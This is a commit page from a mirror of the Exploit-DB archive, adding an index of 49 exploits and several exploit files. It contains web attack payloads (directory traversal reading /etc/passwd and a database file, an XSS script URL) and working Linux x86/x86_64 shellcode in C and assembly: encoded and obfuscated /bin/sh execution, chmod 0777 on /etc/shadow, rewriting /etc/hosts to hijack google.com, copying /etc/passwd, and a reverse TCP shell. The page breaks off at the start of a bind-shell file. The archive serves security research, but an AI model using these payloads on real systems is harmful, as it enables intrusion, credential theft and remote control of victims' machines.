bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions

Update: 2015-03-17

Browse source 
49 new exploits
This commit is contained in:
Offensive Security 2015-03-17 08:36:10 +00:00
parent 42107c1e33
commit 51e5e42e74
50 changed files with 3063 additions and 0 deletions
Show stats Download patch file Download diff file Expand all files Collapse all files

49
files.csv
View file

@ -32540,6 +32540,7 @@ id,file,description,date,author,platform,type,port
36101,platforms/java/remote/36101.rb,"Java JMX Server Insecure Configuration Java Code Execution",2015-02-17,metasploit,java,remote,1617
36102,platforms/php/webapps/36102.txt,"Mambo CMS N-Gallery Component SQL Injection Vulnerability",2011-09-02,CoBRa_21,php,webapps,0
36103,platforms/php/webapps/36103.txt,"Mambo CMS AHS Shop Component SQL Injection Vulnerability",2011-09-02,CoBRa_21,php,webapps,0
36104,platforms/windows/local/36104.py,"Publish-It 3.6d - Buffer Overflow (SEH) Exploit",2015-02-18,"Andrew Smith",windows,local,0
36105,platforms/hardware/webapps/36105.sh,"D-Link DSL-2640B - Unauthenticated Remote DNS Change Exploit",2015-02-18,"Todor Donev",hardware,webapps,0
36106,platforms/php/webapps/36106.txt,"Mambo CMS N-Press Component SQL Injection Vulnerability",2011-09-02,CoBRa_21,php,webapps,0
36107,platforms/php/webapps/36107.txt,"KaiBB 2.0.1 SQL Injection and Arbitrary File Upload Vulnerabilities",2011-09-02,KedAns-Dz,php,webapps,0
@ -32564,6 +32565,7 @@ id,file,description,date,author,platform,type,port
36129,platforms/php/webapps/36129.txt,"Pluck 4.7 Multiple Local File Include and File Disclosure Vulnerabilities",2011-09-08,Bl4k3,php,webapps,0
36130,platforms/multiple/remote/36130.txt,"Spring Security HTTP Header Injection Vulnerability",2011-09-09,"David Mas",multiple,remote,0
36131,platforms/php/webapps/36131.txt,"Papoo CMS Light 4.0 Multiple Cross Site Scripting Vulnerabilities",2011-09-12,"Stefan Schurtz",php,webapps,0
36132,platforms/xml/webapps/36132.txt,"Pentaho < 4.5.0 - User Console XML Injection Vulnerability",2015-02-20,"K.d Long",xml,webapps,0
36133,platforms/asp/webapps/36133.txt,"Orion Network Performance Monitor 10.1.3 'CustomChart.aspx' Cross Site Scripting Vulnerability",2011-09-12,"Gustavo Roberto",asp,webapps,0
36134,platforms/asp/webapps/36134.txt,"Microsoft SharePoint 2007/2010 'Source' Parameter Multiple URI Open Redirection Vulnerabilities",2011-09-14,"Irene Abezgauz",asp,webapps,0
36135,platforms/php/webapps/36135.txt,"WordPress Auctions Plugin 1.8.8 'wpa_id' Parameter SQL Injection Vulnerability",2011-09-14,sherl0ck_,php,webapps,0
@ -32637,6 +32639,7 @@ id,file,description,date,author,platform,type,port
36204,platforms/php/webapps/36204.txt,"vtiger CRM 5.2.1 phprint.php Multiple Parameter XSS",2011-10-04,"Aung Khant",php,webapps,0
36205,platforms/hardware/remote/36205.txt,"SonicWALL SessId Cookie Brute-force Weakness Admin Session Hijacking",2011-10-04,"Hugo Vazquez",hardware,remote,0
36206,platforms/windows/remote/36206.rb,"Persistent Systems Client Automation Command Injection RCE",2015-02-27,"Ben Turner",windows,remote,3465
36207,platforms/windows/local/36207.py,"Microsoft Office Word 2007 - RTF Object Confusion (ASLR and DEP Bypass)",2015-02-28,R-73eN,windows,local,0
36208,platforms/php/webapps/36208.txt,"vtiger CRM 5.2 'onlyforuser' Parameter SQL Injection Vulnerability",2011-10-15,"Aung Khant",php,webapps,0
36209,platforms/windows/remote/36209.html,"Microsoft Internet Explorer 8 Select Element Memory Corruption Vulnerability",2011-10-11,"Ivan Fratric",windows,remote,0
36211,platforms/windows/dos/36211.txt,"Microsoft Host Integration Server 2004-2010 - Remote Denial Of Service Vulnerability",2011-04-11,"Luigi Auriemma",windows,dos,0
@ -32658,6 +32661,7 @@ id,file,description,date,author,platform,type,port
36228,platforms/php/webapps/36228.txt,"BugFree 2.1.3 Multiple Cross Site Scripting Vulnerabilities",2011-10-12,"High-Tech Bridge SA",php,webapps,0
36229,platforms/linux/local/36229.py,"VFU 4.10-1.1 - Move Entry Buffer Overflow",2015-02-25,"Bas van den Berg",linux,local,0
36230,platforms/php/webapps/36230.txt,"Calculated Fields Form Wordpress Plugin <= 1.0.10 - Remote SQL Injection Vulnerability",2015-03-02,"Ibrahim Raafat",php,webapps,0
36231,platforms/php/webapps/36231.py,"GoAutoDial CE 2.0 - Shell Upload",2015-02-28,R-73eN,php,webapps,0
36232,platforms/php/webapps/36232.txt,"vBulletin vBSEO 4.x.x 'visitormessage.php' Remote Code Injection Vulnerability",2015-03-02,Net.Edit0r,php,webapps,80
36233,platforms/php/webapps/36233.txt,"WordPress Pretty Link Plugin 1.4.56 Multiple Cross Site Scripting Vulnerabilities",2011-10-13,"High-Tech Bridge SA",php,webapps,0
36234,platforms/multiple/dos/36234.txt,"G-WAN 2.10.6 Buffer Overflow Vulnerability and Denial of Service Vulnerability",2011-10-13,"Fredrik Widlund",multiple,dos,0
@ -32668,6 +32672,8 @@ id,file,description,date,author,platform,type,port
36239,platforms/hardware/remote/36239.txt,"Check Point UTM-1 Edge and Safe 8.2.43 Multiple Security Vulnerabilities",2011-10-18,"Richard Brain",hardware,remote,0
36240,platforms/php/webapps/36240.txt,"Site@School 2.4.10 'index.php' Cross Site Scripting and SQL Injection Vulnerabilities",2011-10-18,"Stefan Schurtz",php,webapps,0
36241,platforms/hardware/webapps/36241.txt,"Sagem F@st 3304-V2 - LFI",2015-03-03,"Loudiyi Mohamed",hardware,webapps,0
36242,platforms/php/webapps/36242.txt,"Wordpress Theme Photocrati 4.x.x - SQL Injection & XSS",2015-03-03,ayastar,php,webapps,0
36243,platforms/php/webapps/36243.txt,"WordPress cp-multi-view-calendar <= 1.1.4 - SQL Injection vulnerabilities",2015-03-03,"i0akiN SEC-LABORATORY",php,webapps,0
36244,platforms/php/webapps/36244.txt,"Boonex Dolphin 6.1 'xml/get_list.php' SQL Injection Vulnerability",2011-10-19,"Yuri Goltsev",php,webapps,0
36245,platforms/php/webapps/36245.txt,"Innovate Portal 2.0 'cat' Parameter Cross Site Scripting Vulnerability",2011-10-20,"Eyup CELIK",php,webapps,0
36246,platforms/multiple/remote/36246.txt,"Splunk <= 4.1.6 'segment' Parameter Cross Site Scripting Vulnerability",2011-10-20,"Filip Palian",multiple,remote,0
@ -32697,7 +32703,9 @@ id,file,description,date,author,platform,type,port
36271,platforms/osx/dos/36271.py,"Apple Mac OS X <= 10.6.5 And iOS <= 4.3.3 Mail Denial of Service Vulnerability",2011-10-29,shebang42,osx,dos,0
36272,platforms/php/webapps/36272.txt,"Domain Shop 'index.php' Cross Site Scripting Vulnerability",2011-11-01,Mr.PaPaRoSSe,php,webapps,0
36273,platforms/php/webapps/36273.txt,"vBulletin 4.1.7 Multiple Remote File Include Vulnerabilities",2011-11-01,indoushka,php,webapps,0
36274,platforms/linux_mips/shellcode/36274.c,"Linux/MIPS (Little Endian) - Chmod 666 /etc/shadow (55 Bytes)",2015-03-05,"Sang Min Lee",linux_mips,shellcode,0
36275,platforms/jsp/webapps/36275.txt,"Hyperic HQ Enterprise 4.5.1 Cross Site Scripting and Multiple Unspecified Security Vulnerabilities",2011-11-01,"Benjamin Kunz Mejri",jsp,webapps,0
36276,platforms/linux_mips/shellcode/36276.c,"Linux/MIPS (Little Endian) - Chmod 666 /etc/passwd (55 Bytes)",2015-03-05,"Sang Min Lee",linux_mips,shellcode,0
36277,platforms/php/webapps/36277.txt,"IBSng B1.34(T96) 'str' Parameter Cross Site Scripting Vulnerability",2011-11-01,Isfahan,php,webapps,0
36278,platforms/php/webapps/36278.txt,"eFront 3.6.10 Build 11944 Multiple Cross Site Scripting Vulnerabilities",2011-11-01,"Netsparker Advisories",php,webapps,0
36280,platforms/php/webapps/36280.txt,"Symphony <= 2.2.3 symphony/publish/images filter Parameter XSS",2011-11-01,"Mesut Timur",php,webapps,0
@ -32712,6 +32720,7 @@ id,file,description,date,author,platform,type,port
36289,platforms/php/webapps/36289.txt,"SmartJobBoard 'keywords' Parameter Cross Site Scripting Vulnerability",2011-11-07,Mr.PaPaRoSSe,php,webapps,0
36290,platforms/php/webapps/36290.txt,"Admin Bot 'news.php' SQL Injection Vulnerability",2011-11-07,baltazar,php,webapps,0
36291,platforms/windows/remote/36291.txt,"XAMPP 1.7.7 'PHP_SELF' Variable Multiple Cross Site Scripting Vulnerabilities",2011-11-07,"Gjoko Krstic",windows,remote,0
36292,platforms/java/webapps/36292.txt,"Oracle NoSQL 11g 1.1.100 R2 - 'log' Parameter Directory Traversal Vulnerability",2011-11-07,Buherátor,java,webapps,0
36293,platforms/php/webapps/36293.txt,"Centreon 2.3.1 'command_name' Parameter Remote Command Execution Vulnerability",2011-11-04,"Christophe de la Fuente",php,webapps,0
36294,platforms/linux/local/36294.c,"Linux Kernel <= 3.0.4 '/proc/interrupts' Password Length Local Information Disclosure Weakness",2011-11-07,"Vasiliy Kulikov",linux,local,0
36295,platforms/php/webapps/36295.txt,"PBCS Technology 'articlenav.php' SQL Injection Vulnerability",2011-11-08,Kalashinkov3,php,webapps,0
@ -32776,6 +32785,8 @@ id,file,description,date,author,platform,type,port
36355,platforms/jsp/webapps/36355.txt,"HP Network Node Manager i 9.10 nnm/protected/ping.jsp nodename Parameter XSS",2011-11-24,anonymous,jsp,webapps,0
36356,platforms/jsp/webapps/36356.txt,"HP Network Node Manager i 9.10 nnm/protected/statuspoll.jsp nodename Parameter XSS",2011-11-24,anonymous,jsp,webapps,0
36357,platforms/jsp/webapps/36357.txt,"HP Network Node Manager i 9.10 nnm/protected/traceroute.jsp nodename Parameter XSS",2011-11-24,anonymous,jsp,webapps,0
36358,platforms/php/webapps/36358.html,"CS-Cart 4.2.4 - CSRF",2015-03-11,"Luis Santana",php,webapps,0
36359,platforms/lin_x86-64/shellcode/36359.c,"x86_64 Shellcode (118 Bytes) - Reads Data From /etc/passwd To /tmp/outfile (118 bytes)",2014-03-27,"Chris Higgins",lin_x86-64,shellcode,0
36360,platforms/windows/remote/36360.rb,"Adobe Flash Player ByteArray UncompressViaZlibVariant Use After Free",2015-03-12,metasploit,windows,remote,0
36361,platforms/windows/dos/36361.py,"Titan FTP Server 8.40 'APPE' Command Remote Denial Of Service Vulnerability",2011-11-25,"Houssam Sahli",windows,dos,0
36362,platforms/php/webapps/36362.txt,"eSyndiCat Pro 2.3.5 Multiple Cross Site Scripting Vulnerabilities",2011-11-26,d3v1l,php,webapps,0
@ -32784,3 +32795,41 @@ id,file,description,date,author,platform,type,port
36365,platforms/php/webapps/36365.txt,"Manx 1.0.1 admin/tiny_mce/plugins/ajaxfilemanager_OLD/ajax_get_file_listing.php Multiple Parameter XSS",2011-11-28,LiquidWorm,php,webapps,0
36366,platforms/php/webapps/36366.txt,"Manx 1.0.1 /admin/admin_blocks.php fileName Parameter Traversal Arbitrary File Access",2011-11-28,LiquidWorm,php,webapps,0
36367,platforms/php/webapps/36367.txt,"Manx 1.0.1 /admin/admin_pages.php fileName Parameter Traversal Arbitrary File Access",2011-11-28,LiquidWorm,php,webapps,0
36368,platforms/php/webapps/36368.txt,"WoltLab Community Gallery - Stored XSS",2015-03-13,"ITAS Team",php,webapps,0
36369,platforms/xml/webapps/36369.txt,"Citrix Netscaler NS10.5 - WAF Bypass Via HTTP Header Pollution",2015-03-12,"BGA Security",xml,webapps,0
36370,platforms/linux/remote/36370.txt,"ArcSight Logger - Arbitrary File Upload (Code Execution)",2015-03-13,"Horoszkiewicz Julian ISP_",linux,remote,0
36371,platforms/php/webapps/36371.txt,"Codiad 2.5.3 - LFI Vulnerability",2015-03-12,"TUNISIAN CYBER",php,webapps,0
36372,platforms/php/webapps/36372.txt,"Wordpress Theme DesignFolio Plus 1.2 - Arbitrary File Upload Vulnerability",2015-03-04,"Crash bandicot",php,webapps,0
36373,platforms/php/webapps/36373.txt,"Joomla Simple Photo Gallery 1.0 - Arbitrary File Upload",2015-03-10,"Crash bandicot",php,webapps,0
36374,platforms/php/webapps/36374.txt,"Wordpress Plugin Reflex Gallery 3.1.3 - Arbitrary File Upload",2015-03-08,"Crash bandicot",php,webapps,0
36375,platforms/asp/webapps/36375.txt,"Virtual Vertex Muster 6.1.6 Web Interface Directory Traversal Vulnerability",2011-11-29,"Nick Freeman",asp,webapps,0
36376,platforms/windows/remote/36376.txt,"Oxide WebServer Directory Traversal Vulnerability",2011-11-29,demonalex,windows,remote,0
36377,platforms/multiple/dos/36377.txt,"CoDeSys 3.4 HTTP POST Request NULL Pointer Content-Length Parsing Remote DoS",2011-11-30,"Luigi Auriemma",multiple,dos,0
36378,platforms/multiple/dos/36378.txt,"CoDeSys 3.4 NULL Pointer Invalid HTTP Request Parsing Remote DoS",2011-11-30,"Luigi Auriemma",multiple,dos,0
36379,platforms/php/webapps/36379.txt,"OrangeHRM <= 2.6.11 index.php Multiple Parameter XSS",2011-11-30,"High-Tech Bridge SA",php,webapps,0
36380,platforms/php/webapps/36380.txt,"OrangeHRM <= 2.6.11 lib/controllers/CentralController.php URI XSS",2011-11-30,"High-Tech Bridge SA",php,webapps,0
36381,platforms/php/webapps/36381.txt,"OrangeHRM <= 2.6.11 lib/controllers/CentralController.php id Parameter SQL Injection",2011-11-30,"High-Tech Bridge SA",php,webapps,0
36382,platforms/php/webapps/36382.txt,"WordPress 1-jquery-photo-gallery-slideshow-flash Plugin 1.01 Cross Site Scripting Vulnerability",2011-11-30,Am!r,php,webapps,0
36383,platforms/php/webapps/36383.txt,"WordPress flash-album-gallery Plugin 'facebook.php' Cross Site Scripting Vulnerability",2011-11-30,Am!r,php,webapps,0
36384,platforms/php/webapps/36384.txt,"SugarCRM Community Edition 6.3.0RC1 'index.php' Multiple SQL Injection Vulnerabilities",2011-11-30,"High-Tech Bridge SA",php,webapps,0
36385,platforms/php/webapps/36385.txt,"Joomla Simple Photo Gallery 1.0 - SQL injection",2015-03-16,"Moneer Masoud",php,webapps,0
36386,platforms/php/webapps/36386.txt,"Smart PHP Poll - Auth Bypass Vulnerability",2015-03-16,"Mr.tro0oqy yemen",php,webapps,0
36388,platforms/linux/local/36388.py,"Brasero CD/DVD Burner 3.4.1 - 'm3u' Buffer Overflow Crash PoC",2015-03-16,"Avinash Thapa",linux,local,0
36390,platforms/windows/local/36390.txt,"Foxit Reader 7.0.6.1126 - Unquoted Service Path Elevation Of Privilege",2015-03-16,LiquidWorm,windows,local,0
36391,platforms/lin_x86/shellcode/36391.c,"Shellcode - linux/x86 - ROT13 encoded execve(""/bin/sh"") (68 bytes)",2015-03-16,"Maximiliano Gomez Vidal",lin_x86,shellcode,0
36392,platforms/windows/dos/36392.txt,"Intel Network Adapter Diagnostic Driver - IOCTL Handling Vulnerability",2015-03-14,"Glafkos Charalambous ",windows,dos,0
36393,platforms/lin_x86/shellcode/36393.c,"Shellcode - Linux/x86 - chmod 0777 /etc/shadow obfuscated (84 bytes)",2015-03-16,"Maximiliano Gomez Vidal",lin_x86,shellcode,0
36394,platforms/lin_x86/shellcode/36394.c,"Shellcode - linux/x86 - Obfuscated - map google.com to 127.1.1.1 (98 bytes)",2015-03-16,"Maximiliano Gomez Vidal",lin_x86,shellcode,0
36395,platforms/lin_x86/shellcode/36395.c,"Shellcode - linux/x86 - Obfuscated execve(""/bin/sh"") (40 bytes)",2015-03-16,"Maximiliano Gomez Vidal",lin_x86,shellcode,0
36397,platforms/lin_x86/shellcode/36397.c,"Shellcode - Linux/x86 - Reverse TCP Shell (72 bytes)",2015-03-16,"Maximiliano Gomez Vidal",lin_x86,shellcode,0
36398,platforms/lin_x86/shellcode/36398.c,"Shellcode - Linux/x86 - TCP Bind Shell (96 bytes)",2015-03-16,"Maximiliano Gomez Vidal",lin_x86,shellcode,0
36401,platforms/php/webapps/36401.txt,"AtMail 1.04 'func' Parameter Multiple Cross-Site Scripting Vulnerabilities",2011-12-01,Dognædis,php,webapps,0
36402,platforms/asp/webapps/36402.txt,"Hero 3.69 'month' Parameter Cross Site Scripting Vulnerability",2011-12-01,"Gjoko Krstic",asp,webapps,0
36403,platforms/windows/dos/36403.html,"HP Device Access Manager for HP ProtectTools 5.0/6.0 Heap Memory Corruption Vulnerability",2011-12-02,"High-Tech Bridge SA",windows,dos,0
36404,platforms/linux/dos/36404.c,"GNU glibc Timezone Parsing Remote Integer Overflow Vulnerability",2009-06-01,dividead,linux,dos,0
36405,platforms/windows/dos/36405.txt,"Serv-U 11.1.0.3 - Denial of Service and Security Bypass Vulnerabilities",2011-12-05,"Luigi Auriemma",windows,dos,0
36406,platforms/php/webapps/36406.txt,"Elxis CMS 2009 index.php task Parameter XSS",2011-12-05,"Ewerson Guimaraes",php,webapps,0
36407,platforms/php/webapps/36407.txt,"Elxis CMS 2009 administrator/index.php URI XSS",2011-12-05,"Ewerson Guimaraes",php,webapps,0
36408,platforms/php/webapps/36408.txt,"WordPress Pretty Link Plugin 1.5.2 'pretty-bar.php' Cross Site Scripting Vulnerability",2011-12-06,Am!r,php,webapps,0
36410,platforms/php/webapps/36410.txt,"Simple Machines Forum 1.1.15 ''fckeditor' Arbitrary File Upload Vulnerability",2011-12-06,HELLBOY,php,webapps,0
36411,platforms/windows/shellcode/36411.txt,"Shellcode Win x86-64 - Download & execute (Generator)",2015-03-16,"Ali Razmjoo",windows,shellcode,0

Can't render this file because it is too large.

11
platforms/asp/webapps/36375.txt Executable file
View file

@ -0,0 +1,11 @@
source: http://www.securityfocus.com/bid/50841/info
Virtual Vertex Muster is prone to a directory-traversal vulnerability because it fails to sufficiently sanitize user-supplied input submitted to its web interface.
Exploiting this issue will allow an attacker to view arbitrary files within the context of the webserver. Information harvested may aid in launching further attacks.
Virtual Vertex Muster 6.1.6 is vulnerable; other versions may also be affected.
The following example request is available:
GET /a\..\..\muster.db HTTP/1.1

9
platforms/asp/webapps/36402.txt Executable file
View file

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/50878/info
Hero is prone to a cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied data.
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and launch other attacks.
Hero 3.69 is vulnerable; other versions may also be affected.
http://www.example.com/hero_os/events?month=January.htaccess.aspx%22%3E%3Cscript%3Ealert%281%29%3C/script%3E

9
platforms/java/webapps/36292.txt Executable file
View file

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/50567/info
Oracle NoSQL is prone to a directory-traversal vulnerability because the application fails to properly sanitize user-supplied input.
An attacker can exploit this vulnerability to obtain arbitrary local files in the context of the webserver process.
NoSQL 11g 1.1.100 R2 is vulnerable; other versions may also be affected.
http://www.example.com/kvadminui/LogDownloadService?log=../../../../../../../../../../../../../../../etc/passwd

62
platforms/lin_x86-64/shellcode/36359.c Executable file
View file

@ -0,0 +1,62 @@
/*
Reads data from /etc/passwd to /tmp/outfile
No null bytes
Author: Chris Higgins <chris@chigs.me>
@ch1gg1ns -- github.com/chiggins -- http://chigstuff.com/blog/2014/03/29/my-first-shellcode/
chigstuff.com
Date: 3-27-2014
Size: 118 bytes
Tested: ArchLinux x86_64 3.13.6-1
Assembly:
xor rax, rax
mov al, 2
xor rdi, rdi
mov rbx, 0x647773
push rbx
mov rbx, 0x7361702f6374652f
push rbx
lea rdi, [rsp]
xor rsi, rsi
syscall
mov rbx, rax
xor rax, rax
mov rdi, rbx
mov rsi, rsp
mov dx, 0xFFFF
syscall
mov r8, rax
mov rax, rsp
xor rbx, rbx
push rbx
mov rbx, 0x656c6966
push rbx
mov rbx, 0x74756f2f706d742f
push rbx
mov rbx, rax
xor rax, rax
mov al, 2
lea rdi, [rsp]
xor rsi, rsi
push 0x66
pop si
syscall
mov rdi, rax
xor rax, rax
mov al, 1
lea rsi, [rbx]
xor rdx, rdx
mov rdx, r8
syscall
*/
#include <stdio.h>
#include <string.h>
char shellcode[] = "\x48\x31\xc0\xb0\x02\x48\x31\xff\xbb\x73\x77\x64\x00\x53\x48\xbb\x2f\x65\x74\x63\x70\x61\x73\x53\x48\x8d\x3c\x24\x48\x31\xf6\x0f\x05\x48\x89\xc3\x48\x31\xc0\x48\x89\xdf\x48\x89\xe6\x66\xba\xff\xff\x0f\x05\x49\x89\xc0\x48\x89\xe0\x48\x31\xdb\x53\xbb\x66\x69\x6c\x65\x53\x48\xbb\x2f\x74\x6d\x70\x6f\x75\x74\x53\x48\x89\xc3\x48\x31\xc0\xb0\x02\x48\x8d\x3c\x24\x48\x31\xf6\x6a\x66\x66\x5e\x0f\x05\x48\x89\xc7\x48\x31\xc0\xb0\x01\x48\x8d\x33\x48\x31\xd2\x4c\x89\xc2\x0f\x05";
int main() {
printf("len: %d bytes", sizeof shellcode);
(*(void (*)()) shellcode);
return 0;
}

65
platforms/lin_x86/shellcode/36391.c Executable file
View file

@ -0,0 +1,65 @@
/*
* Linux x86 - ROT13 encoded execve("/bin/sh") - 68 bytes
* Author: xmgv
* Details: https://xmgv.wordpress.com/2015/03/04/slae-4-custom-shellcode-encoder/
*/
/*
global _start
section .text
_start:
jmp short call_decoder
decoder:
pop esi ; shellcode address
xor ecx, ecx ; zero out ecx
mov cl, len ; initialize counter
decode:
cmp byte [esi], 0xD ; can we substract 13?
jl wrap_around ; nope, we need to wrap around
sub byte [esi], 0xD ; substract 13
jmp short process_shellcode ; process the rest of the shellcode
wrap_around:
xor edx, edx ; zero out edx
mov dl, 0xD ; edx = 13
sub dl, byte [esi] ; 13 - shellcode byte value
xor ebx,ebx ; zero out ebx
mov bl, 0xff ; store 0x100 without introducing null bytes
inc ebx
sub bx, dx ; 256 - (13 - shellcode byte value)
mov byte [esi], bl ; write decoded value
process_shellcode:
inc esi ; move to the next byte
loop decode ; decode current byte
jmp short shellcode ; execute decoded shellcode
call_decoder:
call decoder
shellcode:
db 0x3e,0xcd,0x5d,0x75,0x3c,0x3c,0x80,0x75,0x75,0x3c,0x6f,0x76,0x7b
db 0x96,0xf0,0x5d,0x96,0xef,0x60,0x96,0xee,0xbd,0x18,0xda,0x8d
len: equ $-shellcode
*/
#include <stdio.h>
#include <string.h>
unsigned char code[] =
// Decoder stub:
"\xeb\x24\x5e\x31\xc9\xb1\x19\x80\x3e\x0d\x7c\x05\x80\x2e\x0d\xeb\x10\x31\xd2"
"\xb2\x0d\x2a\x16\x31\xdb\xb3\xff\x43\x66\x29\xd3\x88\x1e\x46\xe2\xe3\xeb\x05"
"\xe8\xd7\xff\xff\xff"
// Encoded shellcode:
"\x3e\xcd\x5d\x75\x3c\x3c\x80\x75\x75\x3c\x6f\x76\x7b\x96\xf0\x5d\x96\xef\x60"
"\x96\xee\xbd\x18\xda\x8d";
int main(void) {
printf("Shellcode Length: %d\n", strlen(code));
int (*ret)() = (int(*)())code;
ret();
}

77
platforms/lin_x86/shellcode/36393.c Executable file
View file

@ -0,0 +1,77 @@
/*
* Linux x86 - execve chmod 0777 /etc/shadow
* Obfuscated version - 84 bytes
* Original: http://shell-storm.org/shellcode/files/shellcode-828.php
* Author: xmgv
* Details: https://xmgv.wordpress.com/2015/03/13/slae-6-polymorphic-shellcode/
*/
/*
global _start
section .text
_start:
sub edx, edx
push edx
mov eax, 0xb33fb33f
sub eax, 0x3bd04ede
push eax
jmp short two
end:
int 0x80
four:
push edx
push esi
push ebp
push ebx
mov ecx, esp
push byte 0xc
pop eax
dec eax
jmp short end
three:
push edx
sub eax, 0x2c3d2dff
push eax
mov ebp, esp
push edx
add eax, 0x2d383638
push eax
sub eax, 0x013ffeff
push eax
sub eax, 0x3217d6d2
add eax, 0x31179798
push eax
mov ebx, esp
jmp short four
two:
sub eax, 0x0efc3532
push eax
sub eax, 0x04feca01
inc eax
push eax
mov esi, esp
jmp short three
*/
#include <stdio.h>
#include <string.h>
unsigned char code[] =
"\x29\xd2\x52\xb8\x3f\xb3\x3f\xb3\x2d\xde\x4e\xd0\x3b\x50\xeb\x33\xcd\x80"
"\x52\x56\x55\x53\x89\xe1\x6a\x0c\x58\x48\xeb\xf2\x52\x2d\xff\x2d\x3d\x2c"
"\x50\x89\xe5\x52\x05\x38\x36\x38\x2d\x50\x2d\xff\xfe\x3f\x01\x50\x2d\xd2"
"\xd6\x17\x32\x05\x98\x97\x17\x31\x50\x89\xe3\xeb\xcf\x2d\x32\x35\xfc\x0e"
"\x50\x2d\x01\xca\xfe\x04\x40\x50\x89\xe6\xeb\xca";
int main() {
printf("Shellcode Length: %d\n", strlen(code));
int (*ret)() = (int(*)())code;
ret();
}

78
platforms/lin_x86/shellcode/36394.c Executable file
View file

@ -0,0 +1,78 @@
/*
* Linux x86 - map google.com to 127.1.1.1 in /etc/hosts
* Obfuscated version - 98 bytes
* Original: http://shell-storm.org/shellcode/files/shellcode-893.php
* Author: xmgv
* Details: https://xmgv.wordpress.com/2015/03/13/slae-6-polymorphic-shellcode/
*/
/*
global _start
section .text
_start:
push byte 0x4
pop eax
inc eax
sub edx, edx
push edx
mov ecx, 0x88998899
sub ecx, 0x1525152A
push ecx
sub ecx, 0x0B454440
push ecx
sub ecx, 0x04BACA01
inc ecx
push ecx
sub ecx, 0x6374612E
mov ebx, esp
int 0x80
xchg eax, ebx
jmp short _load_data
_write:
pop eax
xchg eax, ecx
push byte 0x3
pop esi
mov eax, esi
inc eax
push len
pop edx
int 0x80
inc esi
inc esi
inc esi
xchg eax, esi
int 0x80
inc eax
int 0x80
_load_data:
call _write
google: db "127.1.1.1 google.com"
len: equ $-google
_random:
cld
xor esi,esi
cld
*/
#include <stdio.h>
#include <string.h>
unsigned char code[] =
"\x6a\x04\x58\x40\x29\xd2\x52\xb9\x99\x88\x99\x88\x81\xe9\x2a\x15\x25\x15"
"\x51\x81\xe9\x40\x44\x45\x0b\x51\x81\xe9\x01\xca\xba\x04\x41\x51\x81\xe9"
"\x2e\x61\x74\x63\x89\xe3\xcd\x80\x93\xeb\x16\x58\x91\x6a\x03\x5e\x89\xf0"
"\x40\x6a\x14\x5a\xcd\x80\x46\x46\x46\x96\xcd\x80\x40\xcd\x80\xe8\xe5\xff"
"\xff\xff\x31\x32\x37\x2e\x31\x2e\x31\x2e\x31\x20\x67\x6f\x6f\x67\x6c\x65"
"\x2e\x63\x6f\x6d\xfc\x31\xf6\xfc";
int main() {
printf("Shellcode Length: %d\n", strlen(code));
int (*ret)() = (int(*)())code;
ret();
}

46
platforms/lin_x86/shellcode/36395.c Executable file
View file

@ -0,0 +1,46 @@
/*
* Linux x86 - execve("/bin/sh") shellcode
* Obfuscated version - 40 bytes
* Original: http://shell-storm.org/shellcode/files/shellcode-811.php
* Author: xmgv
* Details: https://xmgv.wordpress.com/2015/03/13/slae-6-polymorphic-shellcode/
*/
/*
global _start
section .text
_start:
xor edx, edx
push edx
mov eax, 0x563ED8B7
add eax, 0x12345678
push eax
mov eax, 0xDEADC0DE
sub eax, 0x70445EAF
push eax
push byte 0xb
pop eax
mov ecx, edx
mov ebx, esp
push byte 0x1
pop esi
int 0x80
xchg esi, eax
int 0x80
*/
#include <stdio.h>
#include <string.h>
unsigned char code[] =
"\x31\xd2\x52\xb8\xb7\xd8\x3e\x56\x05\x78\x56\x34\x12\x50\xb8\xde\xc0\xad"
"\xde\x2d\xaf\x5e\x44\x70\x50\x6a\x0b\x58\x89\xd1\x89\xe3\x6a\x01\x5e\xcd"
"\x80\x96\xcd\x80";
int main() {
printf("Shellcode Length: %d\n", strlen(code));
int (*ret)() = (int(*)())code;
ret();
}

77
platforms/lin_x86/shellcode/36397.c Executable file
View file

@ -0,0 +1,77 @@
/*
* Linux x86 - Reverse TCP Shell - 72 bytes
* Author: xmgv
* Details: https://xmgv.wordpress.com/2015/02/21/slae-assignment-2-reverse-shell/
*/
/*
global _start
section .text
_start:
; socket(AF_INET, SOCK_STREAM, 0);
push 0x66 ; socketcall()
pop eax
cdq ; zero out edx
push edx ; protocol
inc edx
push edx ; SOCK_STREAM
mov ebx, edx ; socket()
inc edx
push edx ; AF_INET
mov ecx, esp ; load address of the parameter array
int 0x80 ; call socketcall()
; dup2()
xchg ebx, eax ; store sockfd in ebx
mov ecx, edx ; initialize counter to 2
loop:
mov al, 0x3f
int 0x80
dec ecx
jns loop
; connect(sockfd, (struct sockaddr *)&serv_addr, sizeof(serv_addr));
mov al, 0x66 ; socketcall()
xchg ebx, edx ; ebx=2, edx=sockfd
push 0x8501A8C0 ; 192.168.1.133
push word 0x3582 ; port
push word bx ; AF_INET
inc ebx ; connect() -> 3
mov ecx, esp ; point to the structure
push 0x10 ; sizeof(struct sockaddr_in)
push ecx ; &serv_addr
push edx ; sockfd
mov ecx, esp ; load address of the parameter array
int 0x80 ; call socketcall()
; execve(/bin/sh, NULL , NULL);
push 0xb ; execve()
pop eax
cdq ; zero out edx
mov ecx, edx ; zero out ecx
push edx ; push null bytes (terminate string)
push 0x68732f2f ; //sh
push 0x6e69622f ; /bin
mov ebx, esp ; load address of /bin/sh
int 0x80 ; call execve()
*/
#include <stdio.h>
#include <string.h>
unsigned char code[] = \
"\x6a\x66\x58\x99\x52\x42\x52\x89\xd3\x42\x52\x89\xe1\xcd\x80\x93\x89\xd1\xb0"
"\x3f\xcd\x80\x49\x79\xf9\xb0\x66\x87\xda\x68"
"\xc0\xa8\x01\x85" // <--- ip address
"\x66\x68"
"\x82\x35" // <--- tcp port
"\x66\x53\x43\x89\xe1\x6a\x10\x51\x52\x89\xe1\xcd\x80\x6a\x0b\x58\x99\x89\xd1"
"\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\xcd\x80";
int main(void) {
printf("Shellcode Length: %d\n", strlen(code));
int (*ret)() = (int(*)())code;
ret();
}

104
platforms/lin_x86/shellcode/36398.c Executable file
View file

@ -0,0 +1,104 @@
/*
